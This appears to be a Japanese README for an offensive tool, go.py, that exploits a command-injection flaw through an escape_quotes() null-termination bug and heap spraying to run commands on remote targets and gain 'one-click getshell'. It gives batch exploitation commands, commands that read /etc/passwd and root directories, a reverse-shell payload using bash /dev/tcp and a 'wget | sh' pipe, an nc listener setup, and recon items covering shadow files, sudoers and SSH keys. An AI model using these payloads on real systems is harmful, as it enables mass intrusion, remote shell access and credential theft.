
実行可能なコマンドの探索とワンクリックgetshell(サーバーにサービスのデプロイが必要)
実行可能なコマンド検出とワンクリックgetshell(サーバー側にサービスをデプロイする必要あり)が含まれます。 pco.yaml を nuclei と組み合わせて素早く検出できます。
python go.py
ターゲットURLを入力 → 機能メニューを選択するだけです。
# 高速検出(基本情報8項目)
python go.py -t https://IP:PORT --probe fast
# 詳細検出(全コマンド:30+項目)
python go.py -t https://IP:PORT --probe deep
# バッチ検出
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# バッチ並行実行(20スレッド)
python go.py -f targets.txt -c "hostname" --batch 20
攻撃機で2つのターミナルを開きます:
# ターミナル 1 - HTTPサービス(rev.shを提供)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# ターミナル 2 - リバース待機
nc -lvnp 8088
その後ペイロードを送信:
# 単一ターゲット
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# バッチ(逐次、一度に1つだけ受信可能)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
スクリプトは送信前に準備手順を表示します。
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <コマンド> #", ...}
apiuser="''''" により escape_quotes() の null 終端未処理の脆弱性をトリガーg0~g60 でヒープスプレーを61回行い、成功率を向上'; <コマンド> # でコンテキストを閉じ、# で以降をコメントアウトecho タグを使用しない場合、34文字が利用可能:
wget -O- IP:PORT|sh (31 文字)
パイプチェーン:wgetダウンロード → sh実行 → bashで指定ポートにリバース接続。
| カテゴリ | コマンド |
|---|
| 基本情報 | hostname, uname -a, kernel, OS release, uptime |
| ユーザー | id, whoami, users/w/who |
| ネットワーク | ifconfig, route, arp, listening ports, connections, iptables |
| システム | processes, cpuinfo, meminfo, disk, mount |
| ファイル | ls / /root /tmp /home /etc |
| 設定 | crontab, passwd, shadow, sudoers, SSH keys |
| 拡張 | config search, scripts, docker, containers |
| パラメータ | 説明 |
|---|
-t, --target URL | ターゲットアドレス |
-f, --file FILE | ターゲットリストファイル |
-l, --lhost IP | 攻撃機のIP |
-p, --lport PORT | HTTPサービスポート (デフォルト 8087) |
-n, --ncport PORT | nc 待受ポート (デフォルト 8088) |
-c, --cmd CMD | 実行するコマンド |
--probe fast/deep | 高速/詳細検出 |
--batch N | バッチ並行数 (デフォルトは逐次) |